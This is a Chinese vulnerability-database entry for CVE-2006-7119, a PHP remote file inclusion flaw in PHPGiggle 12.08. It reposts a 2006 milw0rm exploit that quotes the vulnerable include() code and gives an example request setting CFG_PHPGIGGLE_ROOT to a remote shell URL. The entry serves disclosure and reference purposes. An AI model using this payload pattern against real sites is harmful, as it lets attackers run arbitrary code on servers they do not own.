J. He PHPGiggle kernel/system/startup.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111476 漏洞类型 未知
发布时间 2006-11-06 更新时间 2007-03-05
CVE编号 CVE-2006-7119 CNNVD-ID CNNVD-200703-179
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2732
https://www.securityfocus.com/bid/86848
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-179
|漏洞详情
当在comscripts.com上进行分区时,J.HePHPGiggle12.08及之前版本的kernel/system/startup.php中存在PHP远程文件包含漏洞。远程攻击者可以借助CFG_PHPGIGGLE_ROOT参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
*******************************************************************************
# Title  :  Php Giggle  <= 12.08 Remote File Include Vulnerability

# Author :   ajann

# Vuln;

*******************************************************************************
[File]
startup.php
[/File]

[Code,1]
startup.php Error:

..
....
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/system/modregistry.inc.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/msg.func.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/fileio.func.php");

       //once the file I/O wrapper is brought up, it is convenient to use
       //function fileInclude
....
..

Key [:] CFG_PHPGIGGLE_ROOT=[file]

\Example:

http://target.com/path/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=[Shell]

# ajann,Turkey
# ...
# Im not Hacker!

http://www.comscripts.com/scripts/php.phpgiggle.565.html =>      Télécharger

# milw0rm.com [2006-11-06]
|受影响的产品
Phpgiggle Phpgiggle 12.08
|参考资料

来源:XF
名称:phpgiggle-startup-file-include(30072)
链接:http://xforce.iss.net/xforce/xfdb/30072
来源:MILW0RM
名称:2732
链接:http://www.milw0rm.com/exploits/2732